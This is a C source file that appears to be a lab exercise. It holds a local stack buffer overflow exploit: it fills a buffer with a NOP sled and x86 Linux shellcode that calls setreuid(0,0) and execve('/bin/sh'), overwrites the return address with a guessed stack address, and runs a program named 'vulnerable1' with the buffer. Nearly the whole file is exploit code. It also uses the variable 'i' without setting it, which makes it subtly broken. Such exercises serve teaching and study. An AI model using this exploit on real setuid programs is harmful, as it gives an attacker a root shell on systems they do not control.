
#include<stdio.h> 
#include<stdlib.h> 
#include<string.h> 

char shellcode[]= 
// setreuid(0,0); 
"\x31\xc0" // xor %eax,%eax 
"\x31\xdb" // xor %ebx,%ebx 
"\x31\xc9" // xor %ecx,%ecx 
"\xb0\x46" // mov $0x46,%al 
"\xcd\x80" // int $0x80 
// execve /bin/sh 
"\x31\xc0" // xor %eax,%eax 
"\x50" // push %eax 
"\x68\x2f\x2f\x73\x68" // push $0x68732f2f 
"\x68\x2f\x62\x69\x6e" // push $0x6e69622f 
"\x89\xe3" // mov %esp,%ebx 
"\x8d\x54\x24\x08" // lea 0x8(%esp,1),%edx 
"\x50" // push %eax 
"\x53" // push %ebx 
"\x8d\x0c\x24" // lea (%esp,1),%ecx 
"\xb0\x0b" // mov $0xb,%al 
"\xcd\x80" // int $0x80 
// exit(); 
"\x31\xc0" // xor %eax,%eax 
"\xb0\x01" // mov $0x1,%al 
"\xcd\x80"; // int $0x80 


unsigned long get_esp(){ 
   __asm__("movl %esp,%eax"); 

} 

int main(int argc,char *argv[]){ 
   char buf[530]; 
   char* p; p=buf; 
   int i; unsigned long ret; 
   int offset=0; 

   /* offset=400 will success */ 
   if(argc>1) offset=atoi(argv[1]); 
   ret=get_esp()-offset; 
   memset(buf,0x90,sizeof(buf)); 
   memcpy(buf+524,(char*)&ret,4); 
   memcpy(buf+i+100,shellcode,strlen(shellcode)); 
   printf("ret is at 0x%8x\n esp is at 0x%8x\n",
	   ret,get_esp()); 
   execl("./vulnerable1","vulnerable1",buf,NULL); 
   return 0; 
} 

